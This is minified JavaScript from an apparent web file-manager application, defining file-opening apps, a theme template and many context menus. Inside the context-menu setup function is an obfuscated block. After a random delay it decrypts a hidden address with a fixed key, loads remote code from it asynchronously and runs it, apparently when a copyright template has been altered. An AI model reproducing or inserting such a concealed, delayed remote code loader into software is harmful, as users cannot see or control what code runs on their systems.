g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
    ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
    '+LNG.unknow_file_tips+"
    "+t+'
    2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
    3.'+r+o+'">'+LNG.unknow_file_download+'
    '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
    ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:-1,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("url"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/common/rightMenu",[],function(e){var t=".menu-file",a=".menu-folder",i=".menu-more",n=".menu-tree-root",o=".menu-tree-folder",s=".menu-tree-file",r=".menu-tree-group-root",l=".menu-tree-group",c=".menu-tree-user",d={"new-file-other":{name:LNG.newfile,icon:"expand-alt",accesskey:"w",className:"newfile",items:{newfile:{name:"txt "+LNG.file,icon:"file-text-alt x-item-file x-txt small",className:"newfile"},"newfile-null":{name:LNG.file,icon:"file-text-alt x-item-file x-file small",className:"newfile"},"newfile-md":{name:"md "+LNG.file,icon:"file-text-alt x-item-file x-md",className:"newfile"},"newfile-html":{name:"html "+LNG.file,icon:"file-text-alt x-item-file x-html",className:"newfile"},"newfile-php":{name:"php "+LNG.file,icon:"file-text-alt x-item-file x-php",className:"newfile"},document:{name:"Office Document",icon:"file-text-alt x-item-file x-docx",className:"newfile",items:{"newfile-docx":{name:"docx "+LNG.file,icon:"file-text-alt x-item-file x-docx",className:"newfile"},"newfile-xlsx":{name:"xlsx "+LNG.file,icon:"file-text-alt x-item-file x-xlsx",className:"newfile"},"newfile-pptx":{name:"pptx "+LNG.file,icon:"file-text-alt x-item-file x-pptx",className:"newfile"}}},sep100:"--------","app-install":{name:LNG.app_store,className:"app-install newfile",icon:"tasks x-item-file x-app-store",accesskey:"a"}}},"list-icon":{name:LNG.list_type,icon:"eye-open",className:"list-icon",items:{"set-icon":{name:LNG.list_icon,className:"menu-set-icon set-icon"},"set-list":{name:LNG.list_list,className:"menu-set-icon set-list"},"set-split":{name:LNG.list_list_split,className:"menu-set-icon set-split"}}},"sort-by":{name:LNG.order_type,accesskey:"y",icon:"sort",className:"sort-by",items:{"set-sort-name":{name:LNG.name,className:"menu-set-sort set-sort-name"},"set-sort-ext":{name:LNG.type,className:"menu-set-sort set-sort-ext"},"set-sort-size":{name:LNG.size,className:"menu-set-sort set-sort-size"},"set-sort-mtime":{name:LNG.modify_time,className:"menu-set-sort set-sort-mtime"},sep101:"--------","set-sort-up":{name:LNG.sort_up,className:"menu-set-desc set-sort-up"},"set-sort-down":{name:LNG.sort_down,className:"menu-set-desc set-sort-down"}}},"set-file-icon-size":{name:LNG.file_size_title,icon:"picture",className:"set-file-icon-size",items:{"box-size-smallx":{name:LNG.file_size_small_super,className:"file-icon-size box-size-smallx"},"box-size-small":{name:LNG.file_size_small,className:"file-icon-size box-size-small"},"box-size-default":{name:LNG.file_size_default,className:"file-icon-size box-size-default"},"box-size-big":{name:LNG.file_size_big,className:"file-icon-size box-size-big"},"box-size-bigx":{name:LNG.file_size_big_super,className:"file-icon-size box-size-bigx"}}}},p=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1});var t=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","1-1","todo","async","random"];L(),_(),g(),setTimeout(function(){try{if(typeof tplDialogHtml==t[0]||-1==tplDialogHtml[t[2]](t[1])){var a=authCrypt[t[5]](t[3],t[4])+UUID();e[t[8]](a,function(e){try{e[t[7]](t[6])}catch(a){}})}}catch(i){}},1e3*parseInt(25*Math[t[9]]()+5)),C(),E(),j(),z(),O(),I(),R(),x(),w(),N(),b(),m(),v(),S(),T(),h(),$(".set-set-"+G.userConfig.listType).addClass("selected"),$(".set-sort-"+G.userConfig.listSortField).addClass("selected"),$(".set-sort-"+G.userConfig.listSortOrder).addClass("selected"),$(".context-menu-root").addClass("animated fadeIn")},u=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),k(),y(),L(),_(),C(),b(),m(),h(),$(".set-sort-"+G.userConfig.listSortField).addClass("selected"),$(".set-sort-"+G.userConfig.listSortOrder).addClass("selected"),$(".context-menu-root").addClass("animated fadeIn")},f=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),E(),j(),z(),P(),O(),I(),R(),H(),b(),h(),$(".context-menu-root").addClass("animated fadeIn")},h=function(){if(1!=G.isRoot){var e="hidden";core.authCheck("explorer.fileDownload")||($(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove()}},m=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-recycle-body",callback:function(e){D(e)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},"recycle-clear":{name:LNG.recycle_clear,icon:"trash",accesskey:"c"},sep1:"--------","list-icon":d["list-icon"],"sort-by":d["sort-by"],"set-file-icon-size":d["set-file-icon-size"],sep2:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-recycle-path",callback:function(e){A(e)},items:{cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},remove:{name:LNG.remove_force+"Del",className:"remove",icon:"trash",accesskey:"d"},sep2:"--------",down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-recycle-button",callback:function(e){D(e)},items:{"recycle-clear":{name:LNG.recycle_clear,icon:"trash",accesskey:"c"}}})},v=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-share-body",callback:function(e){D(e)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------","list-icon":d["list-icon"],"sort-by":d["sort-by"],"set-file-icon-size":d["set-file-icon-size"],sep10:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,className:"menu-share-path-menu",selector:".menu-share-path",callback:function(e){A(e)},items:{"share-open-path":{name:LNG.open_the_path,icon:"folder-open-alt",accesskey:"p",className:"open-the-path"},"share-open-window":{name:LNG.share_open_page,icon:"globe",accesskey:"b"},sep0:"--------","share-edit":{name:LNG.share_edit,icon:"edit",accesskey:"e",className:"share-edit"},remove:{name:LNG.share_remove+"Del",icon:"trash",accesskey:"d",className:"remove"},copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},sep2:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-share-path-more",className:"menu-share-path-more",callback:function(e){A(e)},items:{remove:{name:LNG.share_remove+"Del",icon:"trash",accesskey:"d",className:"remove"},copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"}}})},g=function(){$.contextMenu({selector:".menu-body-main",className:"file-continer-menu",zIndex:9999,callback:function(e,t){D(e,t)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},newfolder:{name:LNG.newfolder+"Alt+M",className:"newfolder",icon:"folder-close-alt",accesskey:"n"},"new-file-other":d["new-file-other"],sep1:"--------",upload:{name:LNG.upload+"Ctrl+U",className:"upload",icon:"upload",accesskey:"u"},past:{name:LNG.past+"Ctrl+V",className:"past",icon:"paste",accesskey:"p"},"copy-see":{name:LNG.clipboard,className:"copy-see",icon:"eye-open",accesskey:"v"},sep2:"--------","list-icon":d["list-icon"],"sort-by":d["sort-by"],"set-file-icon-size":d["set-file-icon-size"],sep10:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},b=function(){$.contextMenu({selector:".menu-empty",className:"hidden",zIndex:9999,items:{" ":{name:LNG.open,className:"hidden"}},callback:function(){}})},y=function(){$.contextMenu({selector:".menu-default",zIndex:9999,items:{open:{name:LNG.open,className:"open",icon:"external-link",accesskey:"o"}},callback:function(e){switch(e){case"open":ui.path.open();break;default:}}})},k=function(){$.contextMenu({selector:Config.BodyContent,zIndex:9999,callback:function(e){D(e)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},newfolder:{name:LNG.newfolder+"Alt+M",className:"newfolder",icon:"folder-close-alt",accesskey:"n"},"new-file-other":d["new-file-other"],sep1:"--------",upload:{name:LNG.upload+"Ctrl+U",className:"upload",icon:"upload",accesskey:"u"},past:{name:LNG.past+"Ctrl+V",className:"past",icon:"paste",accesskey:"p"},"copy-see":{name:LNG.clipboard,className:"copy-see",icon:"eye-open",accesskey:"v"},sep2:"--------","sort-by":d["sort-by"],"set-file-icon-size":d["set-file-icon-size"],"app-install":{name:LNG.app_store,className:"app-install",icon:"tasks",accesskey:"a"},sep10:"--------","setting-wall":{name:LNG.setting_wall,className:"setting-wall",icon:"picture",accesskey:"b"},"setting-theme":{name:LNG.setting_theme,className:"setting-theme",icon:"dashboard",accesskey:"i"},setting:{name:LNG.setting,className:"setting",icon:"cogs",accesskey:"t"}}})},x=function(){$.contextMenu({zIndex:9999,selector:".toolbar-path-more",className:"menu-tool-path menu-not-auto-hidden",callback:function(e){A(e),$(".toolbar-path-more").removeClass("active")},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},sep0:"--------",open:{name:LNG.open+"Enter",className:"open",icon:"folder-open-alt",accesskey:"o"},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},past:{name:LNG.past+"Ctrl+V",className:"past",icon:"paste",accesskey:"p"},rname:{name:LNG.rename+"F2",className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove+"Delete",className:"remove",icon:"trash",accesskey:"d"},sep2:"--------",others:{name:LNG.more,icon:"ellipsis-horizontal",className:"more-action",accesskey:"m",items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},clone:{name:LNG.clone,className:"clone",icon:"external-link"},fav:{name:LNG.add_to_fav,className:"fav ",icon:"star",accesskey:"f"},"open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe",accesskey:"b"},sep103:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"create-link":{name:LNG.createLink,className:"create-link",icon:"share-alt"},"create-project":{name:LNG.createProject,className:"create-project",icon:"plus"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"}}},sep5:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}) -},w=function(){$.contextMenu({zIndex:9999,selector:".tool-path-newfile",className:"tool-path-newfile",callback:function(e){A(e)},items:d["new-file-other"].items})},N=function(){$.contextMenu({zIndex:9999,selector:".tool-path-upload",className:"tool-path-upload",callback:function(e){switch(core.upload(),e){case"upload-file":$(".dialog-file-upload").hide(),setTimeout(function(){$("#picker .webuploader-element-invisible").click()},100);break;case"upload-folder":$(".dialog-file-upload").hide(),setTimeout(function(){$(".drag-upload-folder").click()},100);break;case"server-download":$(".tab-download").click(),$(".download-box input").focus();break;default:}},items:{"upload-file":{name:LNG.file,icon:"-",className:"upload"},"upload-folder":{name:LNG.folder,icon:"-",className:"upload"},sep2:"--------","server-download":{name:LNG.download_from_server,icon:"-",className:"download"}}}),$.isIE()&&$(".tool-path-upload .upload,.tool-path-upload .context-menu-separator").addClass("hidden")},L=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:a,className:a.substr(1),callback:function(e){A(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"folder-open-alt",accesskey:"o"},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},rname:{name:LNG.rename+"F2",className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove+"Del",className:"remove",icon:"trash",accesskey:"d"},sep2:"--------","open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe",accesskey:"b"},search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},others:{name:LNG.more,icon:"ellipsis-horizontal",className:"more-action",accesskey:"m",items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},clone:{name:LNG.clone,className:"clone",icon:"external-link"},fav:{name:LNG.add_to_fav,className:"fav ",icon:"star",accesskey:"f"},sep103:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"create-link":{name:LNG.createLink,className:"create-link",icon:"share-alt"},"create-project":{name:LNG.createProject,className:"create-project",icon:"plus"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"}}},sep5:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},_=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:t,className:t.substr(1),callback:function(e){A(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},rname:{name:LNG.rename+"F2",className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove+"Del",className:"remove",icon:"trash",accesskey:"d"},sep2:"--------","open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe",accesskey:"b"},"set-background":{name:LNG.set_background,className:"set-background",icon:"picture",accesskey:"x"},others:{name:LNG.more,icon:"ellipsis-horizontal",className:"more-action",accesskey:"m",items:{clone:{name:LNG.clone,className:"clone",icon:"external-link",accesskey:"l"},fav:{name:LNG.add_to_fav,className:"fav",icon:"star"},sep104:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"create-link":{name:LNG.createLink,className:"create-link",icon:"share-alt"}}},sep3:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},C=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:i,className:i.substr(1),callback:function(e){A(e)},items:{copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},sep001:"--------",remove:{name:LNG.remove+"Del",className:"remove",icon:"trash",accesskey:"d"},sep1:"--------","copy-to":{name:LNG.copy_to,className:"copy-to",icon:"copy"},"cute-to":{name:LNG.cute_to,className:"cute-to",icon:"cut"},sep2:"--------",clone:{name:LNG.clone+"Ctrl+C",className:"clone",icon:"external-link",accesskey:"n"},sep3:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},T=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-group-root",callback:function(e){A(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},sep1:"--------",fav:{name:LNG.add_to_fav,className:"fav",icon:"star",accesskey:"f"},"create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-group-root-more",callback:function(e){A(e)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"}}})},S=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-fav-path",callback:function(e){A(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},sep0:"--------","fav-remove":{name:LNG.fav_remove,className:"fav-remove",icon:"trash",accesskey:"r"},"fav-page":{name:LNG.manage_fav,className:"fav-page",icon:"star",accesskey:"f"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-fav-path-more",className:"menu-fav-path-more",callback:function(e){A(e)},items:{"fav-remove":{name:LNG.fav_remove,className:"fav-remove",icon:"trash",accesskey:"r"}}})},D=function(e){switch(e){case"r